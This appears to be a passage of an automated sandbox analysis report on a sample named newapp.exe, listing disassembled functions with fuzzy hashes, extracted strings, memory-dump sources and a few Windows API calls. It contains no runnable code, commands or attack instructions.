Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a96782c94963bc1b2f78a22637097b977c74952774d18e2e33ac4d0b58b3285
Instruction ID: a26c1d60eda80b99fc16fb808e60a2ca86ce942c9ada8021da84ecd4e447083e
Opcode Fuzzy Hash: 1a96782c94963bc1b2f78a22637097b977c74952774d18e2e33ac4d0b58b3285
Instruction Fuzzy Hash: E901A232F10229AFCB54DA79E850A9EB779FBC5350F004429E905EB344DB3A9C01C7D1

Function 06F16560 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4405e9de44dd57571e2d32453d828dd1b655bf8ccfd95de5ffa4935e4c49180
Instruction ID: 0c2183ca42b11e7d51cab6c20133a23dcdb857f07b7625763b2c2416e0a826b7
Opcode Fuzzy Hash: e4405e9de44dd57571e2d32453d828dd1b655bf8ccfd95de5ffa4935e4c49180
Instruction Fuzzy Hash: D6F02BB0D063086FDB50DE64CD4566E7BACD702144F1048A5E404CF102F2B3DF1183D1

Function 06F1FF10 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58562948723b476162d2144a362cd37f16bcddcf44a06f894ca4c11753c049b
Instruction ID: ba0763b85b3a211c6f3e5e777bb58dd7508ec575d5b198fdbcbd76ca3b82c9f1
Opcode Fuzzy Hash: f58562948723b476162d2144a362cd37f16bcddcf44a06f894ca4c11753c049b
Instruction Fuzzy Hash: B3E0E531E403151BD760A67D9900A9EFBD9DF80660F008674E4288F298EF65ED0987D0

Non-executed Functions

Function 06F17788 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F17D1F
$^q, xrefs: 06F178D2
$^q, xrefs: 06F178AD
$^q, xrefs: 06F178A1
$^q, xrefs: 06F17CFD
$^q, xrefs: 06F17D13
$^q, xrefs: 06F178DE
$^q, xrefs: 06F17C5E
$^q, xrefs: 06F17C6A
$^q, xrefs: 06F17D09

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 5b0c70ad529ccde9163282e075492e7f6e727e2a5ee7a155c3d352d2d33b4b11
Instruction ID: 872d83f59b718966dfc832db63980514985656e883f14e96253449b4753f1d36
Opcode Fuzzy Hash: 5b0c70ad529ccde9163282e075492e7f6e727e2a5ee7a155c3d352d2d33b4b11
Instruction Fuzzy Hash: 61120C31E002198FDB64EF69D854AAEB7F2BF89344F2085A9D409AF354DB319D85CF81

Function 06F1AA18 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F1AB75
$^q, xrefs: 06F1AB94
$^q, xrefs: 06F1ABD6
$^q, xrefs: 06F1ABA0
$^q, xrefs: 06F1AB0E
$^q, xrefs: 06F1ABCA
$^q, xrefs: 06F1AB1A
$^q, xrefs: 06F1AB69

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 27e88a3b8de1728aace4723b12bc78be7d3fc314c9551f202c4a61ceffee57d3
Instruction ID: aa0e45f6e28af5409d5f4bd871bd1bcbcbe9a4977b2b815ff93590ee51c84750
Opcode Fuzzy Hash: 27e88a3b8de1728aace4723b12bc78be7d3fc314c9551f202c4a61ceffee57d3
Instruction Fuzzy Hash: F4915D31E01209DFDB68DB69D958B6EB7B2EF84380F208429E8019F354DB749D85CB91

Function 06F17188 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F1746A
$^q, xrefs: 06F17624
$^q, xrefs: 06F17690
$^q, xrefs: 06F1769C
$^q, xrefs: 06F174D0
$^q, xrefs: 06F174C4
.5vq, xrefs: 06F171E3

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 0d2dd1c6332df605cb0d6cbb28696ac85c2b53bb42557f7f50c5d87dd28416c7
Instruction ID: 504ecfcb4a69513ccc6c70d847037efa82a53062970093b55392a304da528431
Opcode Fuzzy Hash: 0d2dd1c6332df605cb0d6cbb28696ac85c2b53bb42557f7f50c5d87dd28416c7
Instruction Fuzzy Hash: 53F12C30B00209CFDB59EB79D554A6EBBB6FF84340F208569D4099B368DB35ED86CB81

Function 06F1BAE8 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F1BC81
$^q, xrefs: 06F1BCC1
$^q, xrefs: 06F1BCB5
$^q, xrefs: 06F1BCE9
$^q, xrefs: 06F1BC8D
$^q, xrefs: 06F1BCF5

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: c4c87c88061630202f0818df3b0b130b1ea143abae4b0b9132054d2b27bad5a1
Instruction ID: bab495b37e12c7bf2eb8a431657614c66b63b6f34306dd7fcc5a14725a3f6adc
Opcode Fuzzy Hash: c4c87c88061630202f0818df3b0b130b1ea143abae4b0b9132054d2b27bad5a1
Instruction Fuzzy Hash: 3A718A31E0021ACFDBA8DFA8D9446ADB7A2FF85784B208469D406AF354DB71DD45CB81

Function 06F184C0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F1877F
$^q, xrefs: 06F18726
$^q, xrefs: 06F1878B
$^q, xrefs: 06F1871A

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f08b8270d71b53d6ed674dd936011b64dd4ad6e15b36cef47f6a0c8f1177ea07
Instruction ID: b98278e8284bc1979beab56a2d66720792f35da49779251cc5ba412655b4d150
Opcode Fuzzy Hash: f08b8270d71b53d6ed674dd936011b64dd4ad6e15b36cef47f6a0c8f1177ea07
Instruction Fuzzy Hash: DEB11A31E002098FDB54DBA9DA9469EBBB2FF84390F248429D416DF358DB75DC86CB81

Function 06F188D8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F18963
LR^q, xrefs: 06F18A1A
$^q, xrefs: 06F18957
LR^q, xrefs: 06F189CB

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 51c5bd3ef4bed62b1be57932703b131042d8c93ad7e352b273177b0658672fe2
Instruction ID: cfc2a7d6a7e37d781a0dd240fef0a3f51e3db1370f2ce7e2d518fa6ff4fe4ce5
Opcode Fuzzy Hash: 51c5bd3ef4bed62b1be57932703b131042d8c93ad7e352b273177b0658672fe2
Instruction Fuzzy Hash: 5551C231B002069FDB54DF68D994A6AB7E6FF88780F148569E416DF3A4DB30EC41CB92

Function 06F1ADAF Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F1AED1
$^q, xrefs: 06F1AF24
$^q, xrefs: 06F1AF53
$^q, xrefs: 06F1AF7C

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 1900b4d7079c1e9ba5d142acef02cc1774fff1452c5f316f7db492408b6bc4d6
Instruction ID: f6fa7933efaba8b8743f4ad4f540f2f51792fe3e106d785fcde54ace11044899
Opcode Fuzzy Hash: 1900b4d7079c1e9ba5d142acef02cc1774fff1452c5f316f7db492408b6bc4d6
Instruction Fuzzy Hash: 3A51AF31F112058FCF65DB69E980AAEB3B2EB84350F148529E416DF354DB35DD46CB81

Analysis Process: newapp.exePID: 7396, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	135
Total number of Limit Nodes:	6

Executed Functions

Function 0156ADE8 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0156B03E

Memory Dump Source

Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1560000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 112e6a1a6228b27912f4bc3e774dd0691e3d7754fe8655156f9209541c3208d5
Instruction ID: 4f58bb04d73da7cfbadbcf8d295b130bcaf4536152578f60fc13633031fcba26
Opcode Fuzzy Hash: 112e6a1a6228b27912f4bc3e774dd0691e3d7754fe8655156f9209541c3208d5
Instruction Fuzzy Hash: A0712470A00B058FD724DF69D54479ABBF5FF88304F008A2DD19AEBA50DB35E949CB91

Function 0156590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015659C9

Memory Dump Source

Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1560000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 097251a80213bfa06e8c34209e12e413860ce3e5bea5ff9e4b7d91608f256abe
Instruction ID: ce87fc6c0ff0a27c88106bc40c76289524636ef7e955771b08015378a0b2054e
Opcode Fuzzy Hash: 097251a80213bfa06e8c34209e12e413860ce3e5bea5ff9e4b7d91608f256abe
Instruction Fuzzy Hash: E941B1B1C10719CFDB24CFA9C884ADDBBB5BF49304F24819AD408AB255EB756945CF90

Function 015644B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015659C9

Memory Dump Source

Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1560000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 692aae99c41d48af124d77b1ca295376ebe7882221ba00ccfd1b1e5343f7c43e
Instruction ID: b353cafa9cbd4f34e0ebc292bf97ff0963e8aa32d141ee71d373164b00230afe
Opcode Fuzzy Hash: 692aae99c41d48af124d77b1ca295376ebe7882221ba00ccfd1b1e5343f7c43e
Instruction Fuzzy Hash: 3941A2B0C10719CFDB24DFA9C884B9DBBF5BF49304F2481AAD408AB255EB756985CF90

Function 05644050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05644111

Memory Dump Source

Source File: 0000000B.00000002.2037827216.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5640000_newapp.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: f9160a728c048fd39bfe915fe3685dac9ed5f2ef91145adbfe04fa11296a764e
Instruction ID: a5711d48c62f2bfb2d87b007745a38c64890418174741dc359f94304ef3de29e
Opcode Fuzzy Hash: f9160a728c048fd39bfe915fe3685dac9ed5f2ef91145adbfe04fa11296a764e
Instruction Fuzzy Hash: 1F4129B4900305CFCB14CF99C849BAABBF5FB98314F24C459D519AB321D775A841CFA0

Function 0156B7D0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0156D686,?,?,?,?,?), ref: 0156D747

Memory Dump Source

Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1560000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 663d5fb12ffc332e6f66001f84cfc943741c6965ae89ad644328a5aca7fbb583
Instruction ID: ad15fed91cf83eea83fbc9d383fb6db5844ec0c4bb9feb15eec62c39affb9d73
Opcode Fuzzy Hash: 663d5fb12ffc332e6f66001f84cfc943741c6965ae89ad644328a5aca7fbb583
Instruction Fuzzy Hash: 0A21E4B5900248DFDB10CF9AD584AEEBFF8FB48310F14841AE958A7310D379A954CFA5

Function 0156D6B9 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0156D686,?,?,?,?,?), ref: 0156D747

Memory Dump Source

Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1560000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e32596cdccfb3140ba35e431222488918e207aebaff5cb6a0555f967acae72bd
Instruction ID: b6c78ad0780fab3d9475263815a06b96b1c04b1c3b0481cbf81c42943e52a663
Opcode Fuzzy Hash: e32596cdccfb3140ba35e431222488918e207aebaff5cb6a0555f967acae72bd
Instruction Fuzzy Hash: 1E21E3B5900259DFDB10CF99D584ADEBBF4FB48314F14841AE958B7210D378A940CFA5

Function 0156AFD8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0156B03E

Memory Dump Source

Source File: 0000000B.00000002.2020868136.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1560000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 75f2277e0b0b7c3d5674d266781aa558ac0b06b3010ee721fcaa00169cf76060
Instruction ID: 026a7754a8fda751c8a9aec06c9fd3a03c36ad5b0ac933d829e596c42d42b419
Opcode Fuzzy Hash: 75f2277e0b0b7c3d5674d266781aa558ac0b06b3010ee721fcaa00169cf76060
Instruction Fuzzy Hash: 89110FB6D002498FDB20CF9AC444ADEFBF8AB88224F10842AD568A7210D379A545CFA1

Function 012AD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad3f6f880b6c9e01b3e21ff46147203ada3fb339ef5047086293dcf0a29a5ca
Instruction ID: 4a5162f7acb8cf06a8f00639b1eebd1d61ea0aac79298e9097045918f07c5a34
Opcode Fuzzy Hash: 3ad3f6f880b6c9e01b3e21ff46147203ada3fb339ef5047086293dcf0a29a5ca
Instruction Fuzzy Hash: 0A216775110208DFDB01DF48C9C0B6ABF65FB88324F60C16DEA090F656C33AE446CBA1

Function 012AD110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05b645fc1630b5869e058f5c91bf97436ec7851af6b74b75859175e639f0ea4
Instruction ID: 2941edae4301d97d7f832319a1a2a1e1387a6670419bdcbbd85c143534ff1611
Opcode Fuzzy Hash: c05b645fc1630b5869e058f5c91bf97436ec7851af6b74b75859175e639f0ea4
Instruction Fuzzy Hash: 33216471610208DFDB01DF58C9C0B27BF66FB88310F60C569EA090B656C37AE846CBA1

Function 012BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6269f9784b9a27b48569717e970f8bf45f64397afbc3dde0b0f745e793f47bfb
Instruction ID: 36300a7416f0a95375f0fc9b3a5ae76a2b4c4d54c4ccc4dd30c07a3dab07fc9f
Opcode Fuzzy Hash: 6269f9784b9a27b48569717e970f8bf45f64397afbc3dde0b0f745e793f47bfb
Instruction Fuzzy Hash: EE216470614208DFCB15DF68D9C0BA6BFA1FB88398F20C96DD90A4B256C37BD407CA61

Function 012BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b8a47e3ad159e2b97e4fdf7f9fb894b167218b74ea96bccad46a1e31e85388
Instruction ID: 6b05a51630782fb24b4c8019209ccbc4b5dafd1c7d2d79570969c5f85c75b834
Opcode Fuzzy Hash: 40b8a47e3ad159e2b97e4fdf7f9fb894b167218b74ea96bccad46a1e31e85388
Instruction Fuzzy Hash: BE214971514248DFDB05DF98C5C0BA6BFA5FB84328F20C56DD9094B257C376D846CB61

Function 012BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568b7914e08143248ee0e8934c31e8587209016a874f1c7179c28804f4712950
Instruction ID: 5e28623922ace6eacbee30ce0c6261aee7781420f6e22c444480c9b4d91553ce
Opcode Fuzzy Hash: 568b7914e08143248ee0e8934c31e8587209016a874f1c7179c28804f4712950
Instruction Fuzzy Hash: 902180755083849FCB02CF64D9D4B51BF71EB46318F28C5DAD9498F2A7C33A981ACB62

Function 012AD10B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: c447ee94c47691b5bb531c5337c5268fa1c7974c97ebfd5a1366affd747205df
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: FA110376504244CFCB02CF54D9C4B16BF72FB84314F24C5A9DA090B657C33AE45ACBA1

Function 012AD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019671280.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12ad000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: a8aad74fa4e0dca995f6d51689e624780236ba91e5d73685c5ae21cb41b9eb15
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 5B110376404284CFDB02CF44D5C4B56BF71FB94324F24C2A9DA090B657C33AE45ACBA1

Function 012BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2019745390.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 609fe3e7b0d2a3b9309de8f747003eef52541bbeaae12e5f70f10728097c0eb8
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 4511BB75504284DFDB02CF54C5C4B95BFA1FB84328F24C6AAD9494B297C33AD40ACB61

Analysis Process: newapp.exePID: 5324, Parent PID: 7396COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	211
Total number of Limit Nodes:	22

Executed Functions

Function 069DB318 Relevance: 8.3, Strings: 6, Instructions: 770COMMON

Download Yara Rule

Strings

$^q, xrefs: 069DBCE9
$^q, xrefs: 069DBC81
$^q, xrefs: 069DBCC1
$^q, xrefs: 069DBCF5
$^q, xrefs: 069DBCB5
$^q, xrefs: 069DBC8D

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: dd1e2c02e1044c1309d3327e96df945c2b0cb78377de1b99a1bd621c66e9e0cd
Instruction ID: 5ffeb09dff4239859dfeb5140fe6fba668860b12092ade202d561bf5cd03d7e5
Opcode Fuzzy Hash: dd1e2c02e1044c1309d3327e96df945c2b0cb78377de1b99a1bd621c66e9e0cd
Instruction Fuzzy Hash: 62526FB0E002099FDF64CB68D5807AEB7B9EB85310F25C83AE405EB759DA35DC85CB91

Function 069D3570 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 069D3C7B
$^q, xrefs: 069D3CA4
$^q, xrefs: 069D3CBC
$^q, xrefs: 069D3C98
$^q, xrefs: 069D3C6F
$^q, xrefs: 069D3CC8

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 40fc85ae6d1a85f07d0ac13de934da108a29485bc747d5e558ed9c8d5ebec154
Instruction ID: 126b66aaa1356f89dcd2e989db7e51fad9a72c14795d5d317c58290d3d1e99dd
Opcode Fuzzy Hash: 40fc85ae6d1a85f07d0ac13de934da108a29485bc747d5e558ed9c8d5ebec154
Instruction Fuzzy Hash: 1F321031E1071A8FCB54EF75C854A9DB7B6BF89300F64C66AD409AB254EF309D85CB81

Function 069D7E68 Relevance: 3.0, Strings: 2, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 069D81D7
$^q, xrefs: 069D81CB

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 288d326456e1c5ab8b03151f45e5e245088ccfd2c049323bc5bc11ae484e3c23
Instruction ID: e4a916d74be0e30dc51a5f5e1e1ec620ff9c06d8eeb68f85ef382de98fd3a206
Opcode Fuzzy Hash: 288d326456e1c5ab8b03151f45e5e245088ccfd2c049323bc5bc11ae484e3c23
Instruction Fuzzy Hash: 41029C30B002059FDB54DB68D990AAEB7E6EF84314F24C879E416DB795DB31EC46CB81

Function 069D66E0 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccdc756365d3bd4a2d98f8344d5795910065e31688c55f3302b93e1cc82549f3
Instruction ID: 30aeeffa32655b1641f87b8cf61920f3dcf051ce7ce6e1639ad7eb1a953429c3
Opcode Fuzzy Hash: ccdc756365d3bd4a2d98f8344d5795910065e31688c55f3302b93e1cc82549f3
Instruction Fuzzy Hash: E462AC34A002049FDB54DB68D984AADBBF6EF88314F24C479E806DB790DB35ED46CB90

Function 069DC268 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0951cb57e96259e7fbca586e15fd1e3b40e11f559d7019c38ebf544c40c41b43
Instruction ID: fa5097bd141985382962739f49d74e05122fec5cb7919667c811ce4b56571c47
Opcode Fuzzy Hash: 0951cb57e96259e7fbca586e15fd1e3b40e11f559d7019c38ebf544c40c41b43
Instruction Fuzzy Hash: 61325D34A00205DFDB54DB68D980BADBBBAEB88314F20C539E405EB755DB35EC46CB91

Function 069D56B0 Relevance: .6, Instructions: 602COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c72f3b5631a84cbdca0e1b933fcef551ec6658d1dec0abf4dc4eb18cb63065
Instruction ID: ad40a6a2aa2343988f9ccc613f5d7623e52232401f2652e229d323df393eac9e
Opcode Fuzzy Hash: 20c72f3b5631a84cbdca0e1b933fcef551ec6658d1dec0abf4dc4eb18cb63065
Instruction Fuzzy Hash: E522D175F002159FDF60DF68C8846AEBBA6EB84320F26C43AE859DB745DA34DC41CB91

Function 069DADB0 Relevance: 10.4, Strings: 8, Instructions: 389
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 069DAF53
$^q, xrefs: 069DAF88
$^q, xrefs: 069DAEDD
$^q, xrefs: 069DAF5F
$^q, xrefs: 069DAF7C
$^q, xrefs: 069DAED1
$^q, xrefs: 069DAF30
$^q, xrefs: 069DAF24

Memory Dump Source

Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
